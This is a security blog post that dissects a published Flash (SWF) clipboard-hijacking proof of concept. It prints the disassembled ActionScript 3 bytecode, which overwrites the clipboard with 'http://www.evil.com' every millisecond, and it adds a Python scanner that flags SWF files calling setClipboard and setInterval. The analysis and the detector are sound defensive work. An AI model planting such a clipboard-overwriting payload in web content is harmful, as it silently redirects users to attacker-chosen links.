
Clipboard Hijacking SWF PoC

Thank God, I’m back …

So, the SWF proof-of-concept (PoC) for clipboard hijacking works cross-platform (Windows and Mac browsers). The sneaky behaviour does not exploit any vulnerability; instead it uses legitimate ActionScript, as mentioned in my previous post. Basically, if you refer to the SWF File Format Specification version 9: SWF 9 introduced ActionScript 3.0 together with the new DoABC (Do ActionScript Byte Code) action-definition tag. Like a DoAction tag, a DoABC tag carries a block of bytecode to be executed. This time, however, the DoABC bytecode runs in the ActionScript 3.0 virtual machine, AVM2 [for further reading -> AVM2 Overview].

From the PoC that was published, here is the disassembled DoABC tag (one class, three methods):

// Defining the symbol class "test_fla.MainTimeline" in the package; 515 is the tag length in bytes
[052]       515 DOABC
class [package]test_fla:MainTimeline extends [package]flash.display:MovieClip, test_fla:MainTimeline, flags=08

{ // test_fla:frame1

constructor ---- [package]test_fla:MainTimeline()
[3 1 10 11 0]
{
getlocal_0
pushscope
getlocal_0
constructsuper 0 params
findpropstrict [package]:addFrameScript
pushbyte 00
getlex [packageinternal]test_fla:frame1
callpropvoid [package]:addFrameScript, 2 params
returnvoid
}
// test_fla:frame1() does not call setClip() directly; it registers it with setInterval(setClip, 1), so setClip() fires every millisecond

method ---- [packageinternal]test_fla:frame1()
[3 1 10 11 0]
{
getlocal_0
pushscope
findpropstrict [package]flash.utils:setInterval
getlex [package]:setClip
pushbyte 01
callpropvoid [package]flash.utils:setInterval, 2 params
returnvoid
}

// setClip() overwrites the user's clipboard with "http://www.evil.com" via System.setClipboard()
method ---- [package]:setClip()
[2 1 10 11 0]
{
getlocal_0
pushscope
getlex [package]flash.system:System
pushstring "http://www.evil.com"
callpropvoid [package]:setClipboard, 1 params
returnvoid
} }
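To see how this PoC would be caught on disk rather than noticed in a browser, here is an added example; it is my own scanner and not part of the published PoC. It walks the SWF tag stream (decompressing CWS files as needed), and for every DoABC tag it reads the ABC string constant pool and reports the tag if the pool names setClipboard or setInterval. The sample SWF it builds is constructed for this example: a CWS container with one DoABC tag whose string pool mirrors the listing above; the remaining ABC sections are omitted because the scanner stops after the strings. Caveat: a string-pool hit is a heuristic, since legitimate "copy to clipboard" widgets also call System.setClipboard, so treat a hit as triage, not a verdict.

```python
"""Scan an SWF for DoABC tags whose constant pool references System.setClipboard.

Added example, not code from the original post. Handles uncompressed (FWS) and
zlib-compressed (CWS) files; LZMA (ZWS) is rejected. Only the SWF tag stream and
the ABC string constant pool are parsed, which is enough to spot the identifiers
the PoC relies on.
"""
import struct
import zlib

DOABC_TAG = 82                              # tag code of DoABC (0x52 in the dump above)
SUSPECT = {"setClipboard", "setInterval"}   # identifiers the PoC needs


def read_varint(data, pos):
    """Decode an ABC u30/u32/s32: little-endian base-128, at most 5 bytes."""
    value, shift = 0, 0
    while True:
        b = data[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80 or shift >= 35:
            break
    return value & 0xFFFFFFFF, pos


def abc_strings(abc):
    """Return the string constant pool of an ABC block (index 0, the empty string, is implicit)."""
    pos = 4                                  # skip minor_version (u16) and major_version (u16)
    int_count, pos = read_varint(abc, pos)
    for _ in range(max(int_count - 1, 0)):   # counts include the implicit entry 0
        _, pos = read_varint(abc, pos)
    uint_count, pos = read_varint(abc, pos)
    for _ in range(max(uint_count - 1, 0)):
        _, pos = read_varint(abc, pos)
    double_count, pos = read_varint(abc, pos)
    pos += 8 * max(double_count - 1, 0)      # doubles are fixed 8 bytes each
    string_count, pos = read_varint(abc, pos)
    strings = []
    for _ in range(max(string_count - 1, 0)):
        size, pos = read_varint(abc, pos)
        strings.append(abc[pos:pos + size].decode("utf-8", "replace"))
        pos += size
    return strings


def swf_tags(swf):
    """Yield (tag_code, body) for every tag in an SWF file, stopping at the End tag."""
    sig = swf[:3]
    if sig == b"CWS":
        body = zlib.decompress(swf[8:])      # everything after the 8-byte header is zlib data
    elif sig == b"FWS":
        body = swf[8:]
    else:
        raise ValueError("unsupported or invalid SWF signature %r" % sig)
    nbits = body[0] >> 3                     # frame RECT: 5-bit Nbits, then four Nbits-wide fields
    pos = (5 + 4 * nbits + 7) // 8           # bytes occupied by the RECT
    pos += 4                                 # frame rate (UI16) + frame count (UI16)
    while pos + 2 <= len(body):
        hdr = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = hdr >> 6, hdr & 0x3F  # RECORDHEADER: 10-bit code, 6-bit length
        if length == 0x3F:                   # long form: real length follows as UI32
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:
            break


def scan_swf(swf):
    """Return [(abc_name, sorted_hits)] for each DoABC tag that names a suspect identifier."""
    findings = []
    for code, body in swf_tags(swf):
        if code != DOABC_TAG:
            continue
        name_end = body.index(b"\x00", 4)    # DoABC body: UI32 flags, null-terminated name, ABC data
        name = body[4:name_end].decode("utf-8", "replace")
        hits = SUSPECT.intersection(abc_strings(body[name_end + 1:]))
        if hits:
            findings.append((name, sorted(hits)))
    return findings


def build_sample_swf():
    """Constructed sample: a CWS file with one DoABC tag whose string pool mirrors the PoC listing."""
    strings = [b"flash.system", b"System", b"setClipboard",
               b"flash.utils", b"setInterval", b"http://www.evil.com"]
    abc = struct.pack("<HH", 16, 46)         # minor 16, major 46
    abc += bytes([0, 0, 0])                  # empty int, uint and double pools
    abc += bytes([len(strings) + 1])         # string_count counts the implicit "" at index 0
    for s in strings:
        abc += bytes([len(s)]) + s           # u30 size (all < 128 here) followed by UTF-8 bytes
    # Namespace, method and class sections are omitted: the scanner never reads past the strings.
    tag_body = struct.pack("<I", 0) + b"frame1\x00" + abc
    tags = struct.pack("<H", (DOABC_TAG << 6) | 0x3F) + struct.pack("<I", len(tag_body)) + tag_body
    tags += struct.pack("<H", 0)             # End tag
    movie = bytes([0x00]) + struct.pack("<HH", 0x0C00, 1) + tags   # empty RECT, 12.0 fps, 1 frame
    return b"CWS" + bytes([9]) + struct.pack("<I", 8 + len(movie)) + zlib.compress(movie)


if __name__ == "__main__":
    print(scan_swf(build_sample_swf()))      # [('frame1', ['setClipboard', 'setInterval'])]
```

To run it over a real file, pass `open(path, "rb").read()` to `scan_swf`; a DoABC tag name other than the frame script (for example a library's class bundle) is normal, so read the hits together with the name before drawing conclusions.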

The interesting part here is not the code itself but the legitimate features and capabilities that let it cross the boundary of the user's system security perimeter unasked: a web-delivered SWF can silently overwrite the clipboard, which makes the feature intrusive, sneaky, and a potential vector for attackers and malware.

Should developers have to make sure that their processes run in their own execution domain?

So, whose fault is this ?

  1. September 22, 2008 at 4:38 pm

    thank you, bro

  2. October 6, 2008 at 12:33 am

    that's for sure, man

